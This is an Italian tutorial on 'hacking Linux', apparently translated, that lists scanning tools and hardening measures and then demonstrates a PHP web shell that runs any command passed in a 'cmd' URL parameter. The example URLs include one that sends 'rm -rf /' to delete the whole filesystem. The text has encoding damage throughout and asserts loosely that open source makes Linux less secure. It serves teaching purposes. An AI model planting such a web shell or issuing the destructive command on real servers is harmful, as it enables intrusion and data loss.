Hacking del sistema operativo Linux: hacking con Ubuntu (Tutorial sui comandi)

Linux รจ il sistema operativo server piรน utilizzato, in particolare per i server web. รˆ open source; questo significa che chiunque puรฒ avere accesso al codice sorgente. Ciรฒ lo rende meno sicuro rispetto ad altri sistemi operativi poichรฉ gli aggressori possono studiare il codice sorgente per trovare vulnerabilitร . Linux per gli hacker significa sfruttare queste vulnerabilitร  per ottenere l'accesso non autorizzato a un sistema.

In questo articolo ti presenteremo cos'รจ Linux, le sue vulnerabilitร  di sicurezza e l'hacking Ubuntu e le contromisure che puoi mettere in atto.

Nota veloce su Linux

Linux รจ un sistema operativo open sourceEsistono molte distribuzioni di sistemi operativi basati su Linux come Redhat, Fedora e Ubuntu, ecc. A differenza di altri sistemi operativi, Linux รจ meno sicuro quando si tratta di sicurezza. Questo perchรฉ il codice sorgente รจ disponibile gratuitamente, quindi รจ facile studiarlo per le vulnerabilitร  e sfruttarle rispetto ad altri sistemi operativi che non sono open source. Linux puรฒ essere utilizzato come sistema operativo per server, desktop, tablet o dispositivi mobili.

I programmi Linux possono essere gestiti utilizzando la GUI o i comandi. I comandi Linux per Kali Linux l'hacking รจ piรน efficace ed efficiente rispetto all'utilizzo della GUI. Per questo motivo รจ utile conoscere i comandi Linux di base per l'hacking.

Fare riferimento a questi tutorial https://www.guru99.com/unix-linux-tutorial.html su come iniziare Kali Linux hack.

Strumenti di hacking su Linux

  • Nessusโ€“ questo strumento puรฒ essere utilizzato per Ubuntu hack, scansiona le impostazioni di configurazione, le patch e le reti ecc. puรฒ essere trovato su https://www.tenable.com/products/nessus
  • NMap. Questo strumento puรฒ essere utilizzato per monitorare gli host in esecuzione sul server e i servizi che utilizzano. Puรฒ anche essere utilizzato per eseguire la scansione delle porte. Puรฒ essere trovato su https://nmap.org/
  • SARA โ€“ SARA รจ l'acronimo di Security Auditor's Research Assistant. Come suggerisce il nome, questo strumento puรฒ essere utilizzato per controllare le reti contro minacce come SQL Injection, XSS ecc. puรฒ essere trovato su http://www-arc.com/sara/sara.html

L'elenco sopra riportato non รจ esaustivo; ti dร  un'idea degli strumenti disponibili per Ubuntu hacking e hacking di sistemi Linux.

Come prevenire gli hack di Linux

L'hacking Linux sfrutta le vulnerabilitร  del sistema operativo. Un'organizzazione puรฒ adottare la seguente politica per proteggersi da tali attacchi.

  • Gestione delle patchโ€“ le patch risolvono i bug che gli aggressori sfruttano per compromettere un sistema. Una buona politica di gestione delle patch garantirร  l'applicazione costante delle patch pertinenti al tuo sistema.
  • Configurazione corretta del sistema operativoโ€“ altri exploit sfruttano i punti deboli nella configurazione del server. I nomi utente e i demoni inattivi dovrebbero essere disabilitati. Le impostazioni predefinite come le password comuni per l'applicazione, i nomi utente predefiniti e alcuni numeri di porta dovrebbero essere modificati.
  • Sistema di rilevamento intrusioniโ€“ tali strumenti possono essere utilizzati per rilevare accessi non autorizzati al sistema. Alcuni strumenti hanno la capacitร  di rilevare e prevenire tali attacchi.

Attivitร  di hacking: hackerare a Ubuntu Sistema Linux che utilizza PHP

In questo scenario pratico impareremo come hackerare Ubuntu e ti forniremo le informazioni di base su come puoi utilizzarlo PHP compromettere un Linux. Non prenderemo di mira nessuna vittima. Se vuoi provarlo, puoi installare LAMPP sul tuo computer locale.

PHP viene fornito con due funzioni che possono essere utilizzate per eseguire comandi di hacking di Linux. Ha le funzioni exec() e shell_exec(). La funzione exec() restituisce l'ultima riga dell'output del comando mentre shell_exec() restituisce l'intero risultato del comando come una stringa.

A scopo dimostrativo, supponiamo che l'attaccante carichi il seguente file su un server web.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

QUI,

Lo script precedente ottiene il comando dalla variabile GET denominata cmd. Il comando viene eseguito utilizzando shell_exec() e i risultati vengono restituiti nel browser.

Il codice sopra riportato puรฒ essere sfruttato utilizzando il seguente URL

http://localhost/cp/konsole.php?cmd=ls%20-l

QUI,

  • โ€œโ€ฆkonsole.php?cmd=ls%20-lโ€assegna il valore ls โ€“l alla variabile cmd.

Il comando in Ubuntu per l'hacking contro il server verrร  eseguito come

shell_exec('ls -l') ;

L'esecuzione del codice sopra riportato su un server web produce risultati simili ai seguenti.

Hackerare un Ubuntu Sistema Linux che utilizza PHP

Il comando precedente visualizza semplicemente i file nella directory corrente e le autorizzazioni

Supponiamo che l'attaccante passi il seguente comando

rm -rf /

QUI,

  • "rm" rimuove i file
  • "rf" esegue il comando rm in modalitร  ricorsiva. Eliminazione di tutte le cartelle e i file
  • "/" indica al comando di avviare l'eliminazione dei file dalla directory principale

L'attacco URL sarebbe simile a questo

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Sintesi

  • Linux รจ un sistema operativo popolare per server, desktop, tablet e dispositivi mobili.
  • Linux รจ open source e il codice sorgente puรฒ essere ottenuto da chiunque. Ciรฒ rende facile individuare le vulnerabilitร . รˆ uno dei migliori sistemi operativi per gli hacker.
  • Comandi di hacking di base e di rete in Ubuntu sono preziosi per gli hacker Linux.
  • Le vulnerabilitร  sono punti deboli che possono essere sfruttati per compromettere un sistema.
  • Una buona sicurezza puรฒ aiutare a proteggere un sistema dalla compromissione da parte di un utente malintenzionato.

Riassumi questo post con: